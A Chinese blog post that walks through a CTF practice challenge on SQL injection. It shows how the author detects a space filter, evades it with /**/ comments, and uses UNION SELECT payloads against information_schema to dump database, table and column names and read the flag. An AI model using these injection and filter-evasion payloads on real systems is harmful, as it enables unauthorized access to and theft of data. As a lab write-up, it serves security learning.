• 爱因斯密
  • 猫爪

爱因斯密的猫

加密世界加密我

  • 爱因斯密
  • 猫爪

简单的SQL注入之2

2018年4月18日2018年4月21日实验吧, 实验吧WEBNo Comments
题目

题干链接:http://www.shiyanbar.com/ctf/1908

有回显的mysql注入

格式:flag{}

解题链接: http://ctf5.shiyanbar.com/web/index_2.php


解法1:检测被过滤的关键词,发现为空格,用/**/替代空格。一个个查表

解法2:sqlmap temper转空格


过程1:

1.直接提交1看看

2.加入'看看

发现报错,可能有注点

3.测试1' and '1'='1

4.1发现被检测了。哪句?and?这里试了好多次。放弃了。看一言别人wp发现是过滤了空格。。

4.2被过滤了空格怎么办? a.hex()法 ; b./**/法。这里用b

5.1测试1'/**/and/**/'1'='1,正确返回1的结果。


5.2测试1'/**/and/**/'1'='2,没返回,故存在注入漏洞


6.开始爆库。

6.1看数据库,payload:

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/#

结果:


6.2看数据表,payload:

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/#

结果:


发现flag表。
6.3看列名,payload:

1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/#

结果:


发现flag列
6.4查看flag列内容

1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/#

结果:

7.得到flag

 

打赏赞微海报分享
sqlsql注入手工注入爆库过滤空格
carmel0
carmel0 (12 Posts)
View all author’s posts

文章导航

【转】定制sqlmap tamper脚本
Guess Next Session

发表评论 取消回复

类别

  • sql技巧 (2)
  • 公告 (1)
  • 实验吧 (7)
  • 实验吧WEB (5)
  • 实验吧密码学 (2)
  • 快速记录 (2)
  • 操作技巧 (1)
  • 未分类 (1)

关键字

00截断 (1) BP技巧 (2) Cookie (1) header头 (2) HTTPS抓包 (1) php函数漏洞 (1) python解题 (2) sql (3) sqlmap (1) sql注入 (3) tamper (1) 代码审计 (2) 公告 (1) 凯撒密码 (1) 列变换 (1) 古典密码 (2) 手工注入 (1) 手机抓包 (1) 水题 (1) 测试 (1) 爆库 (1) 过滤空格 (1)

近期文章

  • 密码保护:VScode+GDB查看C栈及栈信息 2021年11月18日
  • 古典密码 2018年4月21日
  • 变异凯撒 2018年4月21日

快速链接

  • Github
  • 微信公众号
  • E-Mail

功能

  • 登录
  • 条目feed
  • 评论feed
  • WordPress.org
Proudly powered by WordPress | Theme: Doo by ThemeVS.